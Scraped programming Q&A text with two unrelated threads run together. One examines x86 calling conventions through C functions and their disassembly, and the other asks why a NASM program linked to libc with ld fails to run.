now edi and esi are used. all looking like it is the calling convention to me...
a string
extern unsigned int more_fun ( const char * );
unsigned int fun ( void )
{
return(more_fun("Hello World")+7);
}
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <fun+0xe>
e: 48 83 c4 08 add $0x8,%rsp
12: 83 c0 07 add $0x7,%eax
15: c3 retq
eax is not prepped as in printf, so perhaps eax has something to do with the number of parameters that follow, try putting more parameters on your printf and see if eax going in changes.
if I add -m32 on my command line then edi is not used.
00000000 <fun>:
0: 83 ec 18 sub $0x18,%esp
3: 68 00 00 00 00 push $0x0
8: e8 fc ff ff ff call 9 <fun+0x9>
d: 83 c4 1c add $0x1c,%esp
10: 83 c0 07 add $0x7,%eax
13: c3
I suspect the push is a placeholder for the linker to push the address to the string when the linker patches up the binary, this was just an object. So my guess is when you have a 64 bit pointer, the first one or two go into registers then the stack is used after it runs out of registers.
Obviously the compiler works so this is conforming to the compilers calling convention.
extern unsigned int more_fun ( unsigned int );
unsigned int fun ( unsigned int x )
{
return(more_fun(x+5)+7);
}
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: 83 c7 05 add $0x5,%edi
7: e8 00 00 00 00 callq c <fun+0xc>
c: 48 83 c4 08 add $0x8,%rsp
10: 83 c0 07 add $0x7,%eax
13: c3 retq
correction based on Peter's comment. Yeah it does appear that registers are being used here.
And since he mentioned 6 parameters, lets try 7.
extern unsigned int more_fun
(
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int
);
unsigned int fun (
unsigned int a,
unsigned int b,
unsigned int c,
unsigned int d,
unsigned int e,
unsigned int f,
unsigned int g
)
{
return(more_fun(a+1,b+2,c+3,d+4,e+5,f+6,g+7)+17);
}
0000000000000000 <fun>:
0: 48 83 ec 10 sub $0x10,%rsp
4: 83 c1 04 add $0x4,%ecx
7: 83 c2 03 add $0x3,%edx
a: 8b 44 24 18 mov 0x18(%rsp),%eax
e: 83 c6 02 add $0x2,%esi
11: 83 c7 01 add $0x1,%edi
14: 41 83 c1 06 add $0x6,%r9d
18: 41 83 c0 05 add $0x5,%r8d
1c: 83 c0 07 add $0x7,%eax
1f: 50 push %rax
20: e8 00 00 00 00 callq 25 <fun+0x25>
25: 48 83 c4 18 add $0x18,%rsp
29: 83 c0 11 add $0x11,%eax
2c: c3 retq
and sure enough that 7th parameter was pulled from the stack modified and put back on the stack before the call. The other 6 in registers.
I have a following program for NASM (ArchLinux i686)
SECTION .data
LC1: db "library call", 0
SECTION .text
extern exit
extern printf
;global main
;main:
global _start
_start:
push LC1
call printf
push 0
call exit
Which is assembled with command:
nasm -f elf libcall.asm
If to comment two lines with _start and uncomment two lines with main, then assemble and link with the command:
gcc libcall.o -o libcall
Then the program runs OK. But if to assemble the code with _start entry point and link with the command:
ld libcall.o -o libcall -lc
Then after launching the program in bash (via the command ./libcall) the following error message is returned:
bash: ./libcall: No such file or directory
Although the libcall file does exist. objdump shows the following:
[al libcall ]$ objdump -d libcall
libcall: file format elf32-i386
Disassembly of section .plt:
08048190 <printf#plt-0x10>:
8048190: ff 35 78 92 04 08 pushl 0x8049278
8048196: ff 25 7c 92 04 08 jmp *0x804927c
804819c: 00 00 add %al,(%eax)
...
080481a0 <printf#plt>:
80481a0: ff 25 80 92 04 08 jmp *0x8049280
80481a6: 68 00 00 00 00 push $0x0
80481ab: e9 e0 ff ff ff jmp 8048190 <printf#plt-0x10>
080481b0 <exit#plt>:
80481b0: ff 25 84 92 04 08 jmp *0x8049284
80481b6: 68 08 00 00 00 push $0x8
80481bb: e9 d0 ff ff ff jmp 8048190 <printf#plt-0x10>
Disassembly of section .text:
080481c0 <_start>:
80481c0: 68 88 92 04 08 push $0x8049288
80481c5: e8 d6 ff ff ff call 80481a0 <printf#plt>
80481ca: 6a 00 push $0x0
80481cc: e8 df ff ff ff call 80481b0 <exit#plt>
How the NASM assembly code should properly be linked with to libc via ld?
There are some parts of libc/crt that come in object files that you also need to link. Additionally you need to specify some options such as the dynamic loader (aka. interpreter) to use (which is probably the reason for your issue.) Just use gcc to do right thing for you. If you are interested you can run with gcc -v and then you will see the horrible command line it uses to link. You have been warned ;)
PS: you should use the main entry point that you have commented out.